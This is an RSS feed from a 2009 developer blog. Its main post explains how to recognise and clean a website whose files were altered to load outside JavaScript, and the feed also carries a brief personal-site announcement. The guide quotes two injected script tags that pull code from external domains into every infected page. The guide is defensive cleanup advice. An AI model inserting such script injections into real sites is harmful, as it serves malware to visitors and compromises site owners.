<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Eduardo Baret</title>
	<atom:link href="http://www.eduardobaret.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.eduardobaret.com</link>
	<description>Eduardo Baret's Development Team</description>
	<lastBuildDate>Thu, 17 Dec 2009 14:16:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>My site was Hacked and my files were changed / Reported Attack Site</title>
		<link>http://www.eduardobaret.com/2009/12/07/my-site-was-hacked-and-my-files-were-changed-reported-attack-site/</link>
		<comments>http://www.eduardobaret.com/2009/12/07/my-site-was-hacked-and-my-files-were-changed-reported-attack-site/#comments</comments>
		<pubDate>Mon, 07 Dec 2009 08:31:31 +0000</pubDate>
		<dc:creator>Eduardo</dc:creator>
				<category><![CDATA[Things I do]]></category>
		<category><![CDATA[Google blocked my site]]></category>
		<category><![CDATA[Google blocked my website]]></category>
		<category><![CDATA[Hacked]]></category>
		<category><![CDATA[javascript hack]]></category>
		<category><![CDATA[javascript server hacked]]></category>
		<category><![CDATA[javascript virus]]></category>
		<category><![CDATA[javascript website hacked]]></category>
		<category><![CDATA[My site was Hacked]]></category>
		<category><![CDATA[Reported Attack Site]]></category>
		<category><![CDATA[virus hack website]]></category>

		<guid isPermaLink="false">http://www.eduardobaret.com/?p=18</guid>
		<description><![CDATA[This is something very common and normal, I get a call about this every couple months: &#8220;Hey Ed, the files in my server have been edited and now my website is loading some weird JavaScript from sites I do not know&#8221; OR &#8220;Hey Ed, Google blocked my site!!! and I am getting a Reported Attack [...]]]></description>
			<content:encoded><![CDATA[<p>This is something very common and normal, I get a call about this every couple months:<br/><br />
&#8220;Hey Ed, the files in my server have been edited and now my website is loading some weird JavaScript from sites I do not know&#8221;<br />
OR<br />
&#8220;Hey Ed, Google blocked my site!!! and I am getting a Reported Attack Site page.&#8221;</p>
<blockquote><p>Reported Attack Site!<br />
<br/>This web site at website.com has been reported as an attack site and has been blocked based on your security preferences.<br />
<br/>Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.<br />
<br/>Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
</p></blockquote>
<p><img src="http://www.eduardobaret.com/wp-content/uploads/2009/12/reported_attack_site.jpg" alt="Reported Attack Site" title="reported_attack_site" width="440" height="204" class="size-full wp-image-30" /><span id="more-18"></span><br />
<br/><strong>The problem:</strong><br />
You either were hacked or someone who logs into the account/server using FTP has a virus in his/her computer, you are lucky it&#8217;s a simple JS include they did there, trust me, I have seen things you do not even imagine.</p>
<p>If you are luckier there is only one website infected, if not, the whole server is fucked up and all the accounts&#8217; files are edited and in the worst case-scenario the code on the files is a mess.</p>
<p>Last time this happened the problem was a virus in a designer&#8217;s computer, he had no antivirus and the 4 sites he had access to were the only ones infected, that happened the very same day he got the passwords for the FTP.</p>
<p><strong>What we found:</strong><br />
All the files in the server/account that have <em>&#8220;&lt;/header&gt; &lt;body&gt;&#8221;</em> tags were infected.<br />
<br/>For example:<br />
The file ../index.html we opened it and checked the HTML code, we noticed a problem right away, it does not say</p>
<p><em>&lt;/header&gt;&lt;body&gt;</em></p>
<p>instead it says<br />
<em>&lt;/head&gt;&lt;script src=http://vanbeurden-porsche.be/library/index.php &gt;&lt;/script&gt;&lt;body&gt;</em><br />
OR<br />
<em>&lt;/head&gt;<br />
&lt;script src=http://bigcjewelryandloan.com/library/index.php &gt;&lt;/script&gt;&lt;body&gt;</em></p>
<p>Or something similar…</p>
<p><strong>Solution:</strong><br />
The damage is done, get an antivirus and then change your FTP passwords.<br />
Remove that JavaScript code in the head of your pages, replace the files if you have a backup or <strong><a href="http://www.eduardobaret.com/contact/">contact me and I will do it</a>.</strong><br />
<br/><br />
After the files are looking good you will probably want to run a scan using Google to make sure your site is clean after you finish removing the code using this link<br />
<em>http://www.google.com/safebrowsing/diagnostic?site=http://www.YOURsite.com/&amp;hl=en</em><br />
Look at mine:<br />
<a href="http://www.google.com/safebrowsing/diagnostic?site=http://www.eduardobaret.com/&amp;hl=en" target="_blank"><em> http://www.google.com/safebrowsing/diagnostic?site=http://www.eduardobaret.com/&amp;hl=en</em></a><br />
After that you might want to ask Google to verify your site is ok, you will need to use <a href="http://www.google.com/webmasters/tools/" target="_blank">The Webmaster’s Tools from Google</a> and if your site is not OK you will get something like this.</p>
<blockquote><p><em><br />
From google reports:<br/><br />
<br/>Status of the last badware appeal for this site: A review for this site has finished. The site was found to still be dangerous for users. Please review your site again. When you are confident that you have cleaned and secured your site, please request another review.<br />
<br/>Google users will see a warning page when they attempt to visit pages within this site. You can visit the Google Safe Browsing diagnostic page for your site for detailed information about the problems we found. Sample pages that may be distributing malware:…………………</em></p></blockquote>
<p><br/><br/><a href="http://www.eduardobaret.com/contact/"><strong>If you are having a similar problem and need some help let me know.</strong></a><em><br />
</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.eduardobaret.com/2009/12/07/my-site-was-hacked-and-my-files-were-changed-reported-attack-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My personal project</title>
		<link>http://www.eduardobaret.com/2009/03/20/my-personal-project/</link>
		<comments>http://www.eduardobaret.com/2009/03/20/my-personal-project/#comments</comments>
		<pubDate>Fri, 20 Mar 2009 13:24:46 +0000</pubDate>
		<dc:creator>Eduardo</dc:creator>
				<category><![CDATA[About me]]></category>
		<category><![CDATA[free time]]></category>
		<category><![CDATA[My personal project]]></category>
		<category><![CDATA[personal project]]></category>
		<category><![CDATA[send me a message]]></category>

		<guid isPermaLink="false">http://www.eduardobaret.com/?p=7</guid>
		<description><![CDATA[Wow!!! I am so happy because I finally have some free time to start building my personal site, feel free to visit my site and find out what I am doing, there is always something cool going on. I hope you like the site and take a look at the new thing I will be [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-thumbnail wp-image-8" title="happy" src="http://www.eduardobaret.com/wp-content/uploads/2009/03/happy-150x150.jpg" alt="happy" width="150" height="150" />Wow!!! I am so happy because I finally have some free time to start building my personal site, feel free to visit my site and find out what I am doing, there is always something cool going on.</p>
<p>I hope you like the site and take a look at the new thing I will be uploading, feel free to leave a comment or if you prefer send me a message using the form on the right.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.eduardobaret.com/2009/03/20/my-personal-project/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

